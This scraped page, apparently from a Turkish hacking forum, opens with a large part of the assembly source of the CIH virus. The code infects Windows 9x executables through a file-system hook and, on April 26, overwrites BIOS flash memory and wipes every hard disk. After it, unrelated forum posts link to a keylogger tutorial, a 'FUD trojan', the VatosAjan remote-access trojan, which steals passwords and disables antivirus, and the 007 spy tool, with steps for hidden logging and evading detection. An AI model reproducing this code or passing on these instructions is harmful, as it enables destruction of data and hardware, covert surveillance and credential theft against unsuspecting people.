dd 00010053h ; Use EAX, ECX, EDX, and flags
add esp, 08h*04h
xchg edi, eax ; EDI = SystemMemory Start Address
lea eax, MyVirusStart-[at]2[esi]
iretd ; Return to Ring3 Initial Program
; *************************************
; * Install My File System Api Hook *
; *************************************
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-[at]6[edi]
push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, and flags
mov dr0, eax ; Save OldFileSystemApiHook Address
pop eax ; EAX = FileSystemApiHook Address
; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-[at]2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-[at]3[eax], edx
; Modify IFSMgr_InstallFileSystemApiHook Entry Point
lea eax, InstallFileSystemApiHook-[at]3[eax]
mov [ecx], eax
cli
jmp ExitRing0Init
; ************************************************** *******
; * Code Size of Merge Virus Code Section *
; ************************************************** *******
CodeSizeOfMergeVirusCodeSection = offset $
; ************************************************** *******
; * IFSMgr_InstallFileSystemApiHook *
; ************************************************** *******
InstallFileSystemApiHook:
push ebx
call [at]4 ;
[at]4: ;
pop ebx ; mov ebx, offset FileSystemApiHook
add ebx, FileSystemApiHook-[at]4 ;
push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, and flags
pop eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-[at]3[ebx]
pop ecx
push eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-[at]3[ebx]
pop ecx
mov dr0, eax ; Adjust OldFileSystemApiHook Address
pop eax
pop ebx
ret
; ************************************************** *******
; * Static Data *
; ************************************************** *******
OldInstallFileSystemApiHook dd ?
; ************************************************** *******
; * IFSMgr_FileSystemHook *
; ************************************************** *******
; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; *************************************
FileSystemApiHook:
[at]3 = FileSystemApiHook
pushad
call [at]5 ;
[at]5: ;
pop esi ; mov esi, offset
VirusGameDataStartAddress
add esi, VirusGameDataStartAddress-[at]5
; *************************************
; * Is OnBusy !? *
; *************************************
test byte ptr (OnBusy-[at]6)[esi], 01h ; if ( OnBusy )
jnz pIFSFunc ; goto pIFSFunc
; *************************************
; * Is OpenFile !? *
; *************************************
; if ( NotOpenFile )
; goto prevhook
lea ebx, [esp+20h+04h+04h]
cmp dword ptr [ebx], 00000024h
jne prevhook
; *************************************
; * Enable OnBusy *
; *************************************
inc byte ptr (OnBusy-[at]6)[esi] ; Enable OnBusy
; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; *************************************
; mov esi, offset FileNameBuffer
add esi, FileNameBuffer-[at]6
push esi
mov al, [ebx+04h]
cmp al, 0ffh
je CallUniToBCSPath
add al, 40h
mov ah, ':'
mov [esi], eax
inc esi
inc esi
; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname *
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; *************************************
CallUniToBCSPath:
push 00000000h
push FileNameBufferSize
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
add eax, 04h
push eax
push esi
int 20h ; VXDCall UniToBCSPath
UniToBCSPath = $
dd 00400041h
add esp, 04h*04h
; *************************************
; * Is FileName '.EXE' !? *
; *************************************
; cmp [esi+eax-04h], '.EXE'
cmp [esi+eax-04h], 'EXE.'
pop esi
jne DisableOnBusy
IF DEBUG
; *************************************
; * Only for Debug *
; *************************************
; cmp [esi+eax-06h], 'FUCK'
cmp [esi+eax-06h], 'KCUF'
jne DisableOnBusy
ENDIF
; *************************************
; * Is Open Existing File !? *
; *************************************
; if ( NotOpenExistingFile )
; goto DisableOnBusy
cmp word ptr [ebx+18h], 01h
jne DisableOnBusy
; *************************************
; * Get Attributes of the File *
; *************************************
mov ax, 4300h
int 20h ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO = $
dd 00400032h
jc DisableOnBusy
push ecx
; *************************************
; * Get IFSMgr_Ring0_FileIO Address *
; *************************************
mov edi, dword ptr (IFSMgr_Ring0_FileIO-[at]7)[esi]
mov edi, [edi]
; *************************************
; * Is Read-Only File !? *
; *************************************
test cl, 01h
jz OpenFile
; *************************************
; * Modify Read-Only File to Write *
; *************************************
mov ax, 4301h
xor ecx, ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Open File *
; *************************************
OpenFile:
xor eax, eax
mov ah, 0d5h
xor ecx, ecx
xor edx, edx
inc edx
mov ebx, edx
inc ebx
call edi ; VXDCall IFSMgr_Ring0_FileIO
xchg ebx, eax ; mov ebx, FileHandle
; *************************************
; * Need to Restore *
; * Attributes of the File !? *
; *************************************
pop ecx
pushf
test cl, 01h
jz IsOpenFileOK
; *************************************
; * Restore Attributes of the File *
; *************************************
mov ax, 4301h
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Is Open File OK !? *
; *************************************
IsOpenFileOK:
popf
jc DisableOnBusy
; *************************************
; * Open File Already Succeed. ^__^ *
; *************************************
push esi ; Push FileNameBuffer Address to Stack
pushf ; Now CF = 0, Push Flag to Stack
add esi, DataBuffer-[at]7 ; mov esi, offset DataBuffer
; ***************************
; * Get OffsetToNewHeader *
; ***************************
xor eax, eax
mov ah, 0d6h
; For Doing Minimal VirusCode's Length,
; I Save EAX to EBP.
mov ebp, eax
xor ecx, ecx
mov cl, 04h
xor edx, edx
mov dl, 3ch
call edi ; VXDCall IFSMgr_Ring0_FileIO
mov edx, [esi]
; ***************************
; * Get 'PE\0' Signature *
; * of ImageFileHeader, and *
; * Infected Mark. *
; ***************************
dec edx
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; cmp [esi], '\0PE\0'
cmp dword ptr [esi], 00455000h
jne CloseFile
; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; *************************************
; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> [at]8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; *************************************
push ebx ; Save File Handle
push 00h ; Set VirusCodeSectionTableEndMark
; ***************************
; * Let's Set the *
; * Virus' Infected Mark *
; ***************************
push 01h ; Size
push edx ; Pointer of File
push edi ; Address of Buffer
; ***************************
; * Save ESP Register *
; ***************************
mov dr1, esp
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; ***************************
push eax ; Size
; ***************************
; * Let's Read *
; * Image Header in File *
; ***************************
mov eax, ebp
mov cl, SizeOfImageHeaderToRead
add edx, 07h ; Move EDX to NumberOfSections
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; ***************************
lea eax, (AddressOfEntryPoint-[at][esi]
push eax ; Address of Buffer
; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; ***************************
movzx eax, word ptr (SizeOfOptionalHeader-[at][esi]
mul cl
; ***************************
; * Let's Set Section Table *
; ***************************
; Move ESI to the Start of SectionTable
lea esi, (StartOfSectionTable-[at]FPRIVATE "TYPE=PICT;ALT=Cool"[esi]
push eax ; Size
push edx ; Pointer of File
push esi ; Address of Buffer
; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; ***************************
inc ecx
push ecx ; Save NumberOfSections+1
shl ecx, 03h
push ecx ; Save TotalSizeOfVirusCodeSectionTable
add ecx, eax
add ecx, edx
sub ecx, (SizeOfHeaders-[at]9)[esi]
jnc short OnlySetInfectedMark
not ecx
inc ecx
cmp cx, small CodeSizeOfMergeVirusCodeSection
jb OnlySetInfectedMark
; ***************************
; * Save Original *
; * Address of Entry Point *
; ***************************
; Save My Virus First Section Code
; Size of Following Section Table...
; ( Not Include the Size of Virus Code Section Table )
push ecx
xchg ecx, eax ; ECX = Size of Section Table
mov eax, (AddressOfEntryPoint-[at]9)[esi]
add eax, (ImageBase-[at]9)[esi]
mov (OriginalAddressOfEntryPoint-[at]9)[esi], eax
; ***************************
; * Read All Section Tables *
; ***************************
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; ***************************
; EBX = My Virus First Section Code
; Size of Following Section Table
pop ebx
pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
pop ecx ; ECX = NumberOfSections+1
push edi ; Size
add edx, eax
push edx ; Pointer of File
add eax, esi
push eax ; Address of Buffer
; ***************************
; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; ***************************
lea eax, [eax+edi-04h]
mov [eax], ebx
; ***************************
; * Let's Set My Virus *
; * First Section Code *
; ***************************
push ebx ; Size
add edx, edi
push edx ; Pointer of File
lea edi, (MyVirusStart-[at]9)[esi]
push edi ; Address of Buffer
; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; ***************************
mov (NewAddressOfEntryPoint-[at]9)[esi], edx
; ***************************
; * Setup Initial Data *
; ***************************
lea edx, [esi-SizeOfScetionTable]
mov ebp, offset VirusSize
jmp StartToWriteCodeToSections
; ***************************
; * Write Code to Sections *
; ***************************
LoopOfWriteCodeToSections:
add edx, SizeOfScetionTable
mov ebx, (SizeOfRawData-[at]9)[edx]
sub ebx, (VirtualSize-[at]9)[edx]
jbe EndOfWriteCodeToSections
push ebx ; Size
sub eax, 08h
mov [eax], ebx
mov ebx, (PointerToRawData-[at]9)[edx]
add ebx, (VirtualSize-[at]9)[edx]
push ebx ; Pointer of File
push edi ; Address of Buffer
mov ebx, (VirtualSize-[at]9)[edx]
add ebx, (VirtualAddress-[at]9)[edx]
add ebx, (ImageBase-[at]9)[esi]
mov [eax+4], ebx
mov ebx, [eax]
add (VirtualSize-[at]9)[edx], ebx
; Section contains initialized data ==> 00000040h
; Section can be Read. ==> 40000000h
or (Characteristics-[at]9)[edx], 40000040h
StartToWriteCodeToSections:
sub ebp, ebx
jbe SetVirusCodeSectionTableEndMark
add edi, ebx ; Move Address of Buffer
EndOfWriteCodeToSections:
loop LoopOfWriteCodeToSections
; ***************************
; * Only Set Infected Mark *
; ***************************
OnlySetInfectedMark:
mov esp, dr1
jmp WriteVirusCodeToFile
; ***************************
; * Set Virus Code *
; * Section Table End Mark *
; ***************************
SetVirusCodeSectionTableEndMark:
; Adjust Size of Virus Section Code to Correct Value
add [eax], ebp
add [esp+08h], ebp
; Set End Mark
xor ebx, ebx
mov [eax-04h], ebx
; ***************************
; * When VirusGame Calls *
; * VxDCall, VMM Modifies *
; * the 'int 20h' and the *
; * 'Service Identifier' *
; * to 'Call [XXXXXXXX]'. *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First. ^__^ *
; ***************************
lea eax, (LastVxDCallAddress-2-[at]9)[esi]
mov cl, VxDCallTableSize
LoopOfRestoreVxDCallID:
mov word ptr [eax], 20cdh
mov edx, (VxDCallIDTable+(ecx-1)*04h-[at]9)[esi]
mov [eax+2], edx
movzx edx, byte ptr (VxDCallAddressTable+ecx-1-[at]9)[esi]
sub eax, edx
loop LoopOfRestoreVxDCallID
; ***************************
; * Let's Write *
; * Virus Code to the File *
; ***************************
WriteVirusCodeToFile:
mov eax, dr1
mov ebx, [eax+10h]
mov edi, [eax]
LoopOfWriteVirusCodeToFile:
pop ecx
jecxz SetFileModificationMark
mov esi, ecx
mov eax, 0d601h
pop edx
pop ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
jmp LoopOfWriteVirusCodeToFile
; ***************************
; * Let's Set CF = 1 ==> *
; * Need to Restore File *
; * Modification Time *
; ***************************
SetFileModificationMark:
pop ebx
pop eax
stc ; Enable CF(Carry Flag)
pushf
; *************************************
; * Close File *
; *************************************
CloseFile:
xor eax, eax
mov ah, 0d7h
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Need to Restore File Modification *
; * Time !? *
; *************************************
popf
pop esi
jnc IsKillComputer
; *************************************
; * Restore File Modification Time *
; *************************************
mov ebx, edi
mov ax, 4303h
mov ecx, (FileModificationTime-[at]7)[esi]
mov edi, (FileModificationTime+2-[at]7)[esi]
call ebx ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Disable OnBusy *
; *************************************
DisableOnBusy:
dec byte ptr (OnBusy-[at]7)[esi] ; Disable OnBusy
; *************************************
; * Call Previous FileSystemApiHook *
; *************************************
prevhook:
popad
mov eax, dr0 ;
jmp [eax] ; Jump to prevhook
; *************************************
; * Call the Function that the IFS *
; * Manager Would Normally Call to *
; * Implement this Particular I/O *
; * Request. *
; *************************************
pIFSFunc:
mov ebx, esp
push dword ptr [ebx+20h+04h+14h] ; Push pioreq
call [ebx+20h+04h] ; Call pIFSFunc
pop ecx ;
mov [ebx+1ch], eax ; Modify EAX Value in Stack
; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the *
; * Returned pioreq. *
; ***************************
cmp dword ptr [ebx+20h+04h+04h], 00000024h
jne QuitMyVirusFileSystemHook
; *****************
; * Get the File *
; * Modification *
; * Date and Time *
; * in DOS Format.*
; *****************
mov eax, [ecx+28h]
mov (FileModificationTime-[at]6)[esi], eax
; ***************************
; * Quit My Virus' *
; * IFSMgr_FileSystemHook *
; ***************************
QuitMyVirusFileSystemHook:
popad
ret
; *************************************
; * Kill Computer !? ... *^_^* *
; *************************************
IsKillComputer:
; Get Now Month from BIOS CMOS
mov ax, 0708h
out 70h, al
in al, 71h
xchg ah, al
; Get Now Day from BIOS CMOS
out 70h, al
in al, 71h
xor ax, 0426h ; 04/26/????
jne DisableOnBusy
; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; **************************************
; ***************************
; * Kill BIOS EEPROM *
; ***************************
mov bp, 0cf8h
lea esi, IOForEEPROM-[at]7[esi]
; ***********************
; * Show BIOS Page in *
; * 000E0000 - 000EFFFF *
; * ( 64 KB ) *
; ***********************
mov edi, 8000384ch
mov dx, 0cfeh
cli
call esi
; ***********************
; * Show BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
mov di, 0058h
dec edx ; and al,0fh
mov word ptr (BooleanCalculateCode-[at]10)[esi], 0f24h
call esi
; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; * be Writted... *
; ***********************
lea ebx, EnableEEPROMToWrite-[at]10[esi]
mov eax, 0e5555h
mov ecx, 0e2aaah
call ebx
mov byte ptr [eax], 60h
push ecx
loop $
; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E007F *
; * ( 80h Bytes ) *
; ***********************
xor ah, ah
mov [eax], al
xchg ecx, eax
loop $
; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) *
; * can be Writted... *
; ***********************
mov eax, 0f5555h
pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h
loop $
; ***********************
; * Kill the BIOS Main *
; * ROM Data in Memory *
; * 000FE000 - 000FE07F *
; * ( 80h Bytes ) *
; ***********************
mov ah, 0e0h
mov [eax], al
; ***********************
; * Hide BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
; or al,10h
mov word ptr (BooleanCalculateCode-[at]10)[esi], 100ch
call esi
; ***************************
; * Kill All HardDisk *
; ************************************************** *
; * IOR Structure of IOS_SendCommand Needs *
; ************************************************** *
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ************************************************** *
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx
mov esi, esp
sub esp, 0ach
LoopOfKillHardDisk:
int 20h
dd 00100004h ; VXDCall IOS_SendCommand
cmp word ptr [esi+06h], 0017h
je KillNextDataSection
ChangeNextHardDisk:
inc byte ptr [esi+4dh]
jmp LoopOfKillHardDisk
KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber
jmp LoopOfKillHardDisk
; ***************************
; * Enable EEPROM to Write *
; ***************************
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax], cl
mov [ecx], al
ret
; ***************************
; * IO for EEPROM *
; ***************************
IOForEEPROM:
[at]10 = IOForEEPROM
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
in al, dx
BooleanCalculateCode = $
or al, 44h
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
out dx, al
ret
; ************************************************** *******
; * Static Data *
; ************************************************** *******
LastVxDCallAddress = IFSMgr_Ring0_FileIO
VxDCallAddressTable db 00h
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath
VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h
VxDCallTableSize = ($-VxDCallIDTable)/04h
; ************************************************** *******
; * Virus Version Copyright *
; ************************************************** *******
VirusVersionCopyright db 'CIH v'
db MajorVirusVersion+'0'
db '.'
db MinorVirusVersion+'0'
db ' TTIT'
; ************************************************** *******
; * Virus Size *
; ************************************************** *******
VirusSize = $
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(0 8h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)
; ************************************************** *******
; * Dynamic Data *
; ************************************************** *******
VirusGameDataStartAddress = VirusSize
[at]6 = VirusGameDataStartAddress
OnBusy db 0
FileModificationTime dd ?
FileNameBuffer db FileNameBufferSize dup(?)
[at]7 = FileNameBuffer
DataBuffer = $
[at]8 = DataBuffer
NumberOfSections dw ?
TimeDateStamp dd ?
SymbolsPointer dd ?
NumberOfSymbols dd ?
SizeOfOptionalHeader dw ?
_Characteristics dw ?
Magic dw ?
LinkerVersion dw ?
SizeOfCode dd ?
SizeOfInitializedData dd ?
SizeOfUninitializedData dd ?
AddressOfEntryPoint dd ?
BaseOfCode dd ?
BaseOfData dd ?
ImageBase dd ?
[at]9 = $
SectionAlignment dd ?
FileAlignment dd ?
OperatingSystemVersion dd ?
ImageVersion dd ?
SubsystemVersion dd ?
Reserved dd ?
SizeOfImage dd ?
SizeOfHeaders dd ?
SizeOfImageHeaderToRead = $-NumberOfSections
NewAddressOfEntryPoint = DataBuffer ; DWORD
SizeOfImageHeaderToWrite = 04h
StartOfSectionTable = [at]9
SectionName = StartOfSectionTable ; QWORD
VirtualSize = StartOfSectionTable+08h ; DWORD
VirtualAddress = StartOfSectionTable+0ch ; DWORD
SizeOfRawData = StartOfSectionTable+10h ; DWORD
PointerToRawData = StartOfSectionTable+14h ; DWORD
PointerToRe********s = StartOfSectionTable+18h ; DWORD
PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD
NumberOfRe********s = StartOfSectionTable+20h ; WORD
NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD
Characteristics = StartOfSectionTable+24h ; DWORD
SizeOfScetionTable = Characteristics+04h-SectionName
; ************************************************** *******
; * Virus Total Need Memory *
; ************************************************** *******
VirusNeedBaseMemory = $
VirusTotalNeedMemory = [at]9
; + NumberOfSections(??)*SizeOfScetionTable(28h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(0 8h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)
; ************************************************** *******
VirusGame ENDS
END FileHeader
İşte videolu Keylogger yapımı kodlarla birlikte !!
Evet arkadaşlar videolu log alan keylog anlattım videomda video
bana aittir ama kodlar alıntıdır.
Buyrun Link :
https://rapidshare.com/files/1042748...HaCKeR_Log.rar
Keyloggersız Bilgisayara Bağlanmak İsteyenlere!
Öncelikle Merhaba Arkadaşlar.
Size İmkansızı Sunayım Yine
Virüs Yemek imkansız Hale Geldi, Ya %100 Fud Bir Trojan Yazıcağız Desem?
Ya Bir De Bunun İçin Okuma Yazma Bilmek Yeter Desem Bir De?
Yok Artık Değil Bu Gerçek
İşte Videomuz:
DosyaUpload.NeT - File Upload Free File Hosting Dosya Upload Files Upload File Upload Swf Upload
Dosya Upload File Upload Free File Hosting Dosya Upload Files Upload Files Uploads File Upload image upload images upload Free File Hosting @ - dosyasitesi.com
Şifre: turkhackteam.net
Umarım Linkler Kırılmaz
Bir De Araç gereçleri Vereyim:
Essential NetTools 4.3 Yapı 264 - Detayli Tanitimi, Kullanici Yorumlari - innDir.com
Umarım Açıklayıcı Olmuşumdur
VatosAjan 2.4
VatosAjan bulaştığı bilgisayarın özelliklerini,kurbanın şifre ve keylog kayıtlarını mailinize gönderen
Bünyesinde bulunan FTP Server ile kurbanın bilgisayarına bağlanılabilen,Sadece VatosAjan’da bulunan
WEB KONTROL özelliği ile router veya direk bağlantı farketmeksizin kurbanın bilgisayarında dosya arama,
dosya silme,istediğiniz dosyaları mailinize gönderme,
downloader gibi çalışıp, istediğiniz dosyaları internetten indirip çalıştırabilme,
mail adresinizi değiştirebilme,registry kayıtlarına ulaşabilme ve kendisini silme emirlerini
uygulayabilecek interaktif bir casus yazılımdır.
VatosAjanın alabildiği şifreler aşağıda yazılmıştır.
Versiyon Farkları;
-Win9x sistemlerde stabil çalışması sağlandı
-FTP Server eklendi
-Server ve serverin kullandığı dosyalar disk üzerinde gizlendi
-Kullanılan componentler değiştirildi
-Firewall ve Antivüslerin kapatılması sağlandı
-Web Kontrol için firewall By Pass edildi
-Servere ayar işleme yöntemi değiştirildi
-Serverin başka bir dosya ile birleşince simgesinin korunması sağlandı
-İlk Çalıştırılma esnasında sahte hata uyarısı verebilme özelliği eklendi
-icon seçim yöntemi değiştirildi.Böylece kendi iconlarınızı da kullanabileceksiniz.
-Server Uzantısını değiştirebilme imkanı eklendi
-Client görünümü ve logo değiştirildi
-Türkçe ve İngilizce Dil Seçeneği eklendi
///////Alınabilen Şifreler\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\
# MSN Messenger
# Windows Messenger (In Windows XP)
# Yahoo Messenger (Versions 5.x and 6.x)
# ICQ Lite 4.x/2003
# AOL Instant Messenger (only older versions, the password in newer versions of AIM cannot be recovered)
# AOL Instant Messenger/Netscape 7
# Trillian
# Miranda
# GAIM
# Outlook Express
# Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
# Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts)
# IncrediMail
# Eudora
# Netscape 6.x/7.x
# Mozilla Thunderbird
# Group Mail Free
# Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
# Hotmail/MSN mail - If the password is saved in MSN Messenger application.
# Gmail
#Otomatik tamamlanan Internet Explorer şifreleri,
#MSN Explorer Şifreleri
Download : Hotfile.com: One click file hosting: VatosAjan.rar
Beni Oku (Şaka Virüsü)
Benim hoşuma gittiği için paylaşıyorum
Şaka olduğunu Bilmeyenler gerçekten kalpten gidebilir yani İndirme Linki ;
Dosya.tc - cretsiz, Hzl ve Kolay Dosya Paylam
Not : Alıntıdır.
007 Casus
Casus Bilgisayar 007, gerçek zamanlı bir bilgisayar takip programıdır. Programı yüklediğiniz bilgisayarda neler olup bitiyor, hangi sitelere giriliyor, kimlerle konuşuluyor, konuşmanın içeriği vs. bütün bunları takip edebilir ve ekran görüntüleri de dahil olmak üzere hepsini öğrenebilirsiniz. Daha da önemlisi o bilgisayarda giriş yapılan tüm Msn, Icq, Yahoo ve tüm e-mail şifrelerini de kaydediyor ve sizin belirlediğiniz mail adresine belirli aralıklarla gönderiyor.Ayrıca; aynı zamanda program ebeveynlerin çocuklarının bilgisayar başında neler yaptığını görmek ve topladıkları bu bilgilerle kötü içerikli veya kötü niyetli bilgisayar kullanımını en aza indirmeyi amaçlayan bir yazılımdır.
Programın Genel Özellikleri:
1.Klavye kaydedici özelliği ile bilgisayarda yazılan bütün herşeyi kaydeder. Örnegin; Msn sohbeti, açılan e-mailler, word dosyaları gibi.
2.İnternette girilen ve gezilen bütün web sitelerini ekran görüntüsü ile beraber kaydeder ve listeleyerek size gönderir.
3.Sizin belirleyeceğiniz aralıklarla bilgisayarın ekranının görüntüsünü alır ve kaydeder.
4.Bilgisayarınız da açılan veya çalıştırılan bütün komutları, dosyaları kaydeder ve listeler.
5.Bilgisayarınız da açılan veya silinen bütün dosyaları kaydeder ve listeler.
6.Bütün bu bilgileri sizin belirleyeceğiniz aralıklarla e-mail adresinize gizlice gönderir.
* Tamamen gizlidir.
* Casus yazılım tarayıcı ve benzeri programlar tarafından farkedilemez.
* Bilgisayar açılınca kendiliğinden otomatik olarak ve gizlice kaydetmeye başlar.
* Programa sadece sizin belirleyeceğiniz şifre ve kısayol tuşu ile gizlice ulaşılabilir.
* Programa girmek için Ctrl - Alt - F7 tuşlarına aynı anda basmalısınız. Programa girince ilk önce şifrenizi belirleyin , sonra e-mail adresinizi girebilirsiniz, böylece bilgisayarınızdan uzaktayken de neler olup bittiğini ögrenebilirsiniz. Ayrıca ekran kaydetme aralığını belirleyin.
* Masa üstünde kayıtlı olan '' 007 Install '' dosyasını silin, çünkü böylece yazılımın daha da gizli olması sağlanır.
* Program birçok kişinin kullandığı bilgisayarlara yüklenerek daha da çok bilgi ele geçirilebilir, fakat bizim temennimiz programın daha çok legal olarak kullanılması yönünde.
Programın dili İngilizce olmasına rağmen kullanımı son derece kolaydır. Çünkü; siz sadece mail adresinizi giriyorsunuz, gerekli olan bilgileri program kendiliğinden otomatikmen gönderiyor, yinede istediğiniz bilgileri kendiniz ayarlamak isterseniz; aşağıda belirttiğimiz terimler ve karşılıkları ile programı kendinize özgün olarak kullanabilirsiniz;
KEYSTROKES LOG : Klavye kaydedici. Bu butonu tıklayarak yazılan sohbetleri,mailleri ve şifreleri görebilirsiniz.
WEBSITES LOG : Bu butonu tıklayarak gezilen web sitelerinin listesini görebilirsiniz.
APPLICATIONS LOG : Bu butonu tıklayarak uygulamaların listesini görebilirsiniz.
SCREENSHOTS LOG : Bu butonu tıklayarak ekran fotoğraflarını görebilirsiniz.
FILE/FOLDERS LOG : Bu butonu tıklayarak açılan, silinen dosyaları görebilirsiniz.
PASSWORD SETUP : Programa girmek için kullanacağınız şifreyi belirleyin.
-Şifreyi belirleyebilmek için '' enable password protection to a**** unauthorised accses '' kutusunu işaretleyin.
HOTKEY SELECTION : Programı görünür yapmak için basmanız gereken tuşları belirlerleyebilirsiniz.
OVERRIDE ANTISPY PROGRAMES : Burayı işaretleyerek anti spy taramalarını atlatabilir, programın anti-virüslere karşı tanınmasını engelleyebilirsiniz.
START UP OPTION : Başlatma seçenekleri. Buradaki bütün kutuları işaretleyin.
ADVANCED OPTION : Gelişmiş seçenekler. Burayı tıklayarak bilgilerin gönderilmesini istediğiniz e-mail adresini belirleyin.
STEALTH MODE : Gizli mod. Programın başkaları tarafından farkedilmemesi için her zaman gizli mod da tutun.
CLEAR LOGS : Kaydedilen tüm içeriği siler.
HIDE : Programı gizler.
STOP : Programı durdurur.
UNINSTALL 007 SPY SOFTWARE : Programı bilgisayardan kaldırır.
CANCEL : Bu sayfada yapılan işlemleri iptal eder.
OK : Bu sayfada yapılan işlemleri kaydeder.
!!! Programı bilgisayarından kaldıramayan kullanıcılar için "uninstall" (kaldırma) açıklaması:
Öncelikle programın çalışır durumda olması gerekiyor. Belirlenen kısayol ile programın arayüzüne ulaşıyoruz ve ardından "Advanced Option" bölümüne girip "Uninstall 007 Spy Software" buttonuna basarak karşımıza çıkan onay sekmesinde "Evet" diyerek kaldırma işlemini tamamlıyoruz.
http://adf.ly/7RZm4
